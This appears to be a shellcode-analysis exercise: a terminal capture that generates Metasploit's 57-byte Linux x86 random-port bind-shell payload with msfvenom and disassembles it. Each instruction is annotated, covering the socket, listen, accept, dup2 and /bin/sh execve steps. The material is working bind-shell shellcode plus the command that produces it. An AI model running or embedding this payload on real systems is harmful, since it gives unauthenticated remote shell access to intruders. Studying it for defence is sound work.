root@nitrogen:~# msfvenom -p linux/x86/shell_bind_tcp_random_port -f raw | ndisasm -u -
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 57 bytes


;SOCKET part
00000000  31DB              xor ebx,ebx			;ebx=0
00000002  F7E3              mul ebx			;eax=0, edx=0
00000004  B066              mov al,0x66			;102 -> syscall socketcall
00000006  43                inc ebx			;ebx=1 --> socket function=1 for SYS_SOCKET
00000007  52                push edx			;protocol=0 for IPPROTO_IP
00000008  53                push ebx			;type=1 for SOCK_STREAM
00000009  6A02              push byte +0x2		;domain=2 for AF_INET
0000000B  89E1              mov ecx,esp			;Pointer to arguments on stack in ecx
0000000D  CD80              int 0x80			;Run syscall 102 --> socket fd in eax

;no SYS_BIND part --> random port

;SYS_LISTEN part
0000000F  52                push edx			;0 for backlog
00000010  50                push eax			;sockfd
00000011  89E1              mov ecx,esp			;pointer to args
00000013  B066              mov al,0x66			;102 -> syscall socketcall
00000015  B304              mov bl,0x4			;socket function=4 for SYS_LISTEN
00000017  CD80              int 0x80			;run syscall 102 with listen

;SYS_ACCEPT part
00000019  B066              mov al,0x66			;102 -> syscall socketcall
0000001B  43                inc ebx			;socket function=5 for SYS_ACCEPT
0000001C  CD80              int 0x80			;run syscall for acceppt

;DUP2 part
0000001E  59                pop ecx			;ecx=file descriptor before accept
0000001F  93                xchg eax,ebx		;ebx=file descriptor after accept
00000020  6A3F              push byte +0x3f		;63
00000022  58                pop eax			;syscall=63 for dup2
00000023  CD80              int 0x80			;run syscall
00000025  49                dec ecx			;loop
00000026  79F8              jns 0x20			;loop

;EXECVE part
00000028  B00B              mov al,0xb			;syscall=11 for execve
0000002A  682F2F7368        push dword 0x68732f2f	;"hs//"	
0000002F  682F62696E        push dword 0x6e69622f	;"nib/" -->"bin//sh" in reverse
00000034  89E3              mov ebx,esp			;position of string on stack
00000036  41                inc ecx			;
00000037  CD80              int 0x80			;run syscall execve for sh

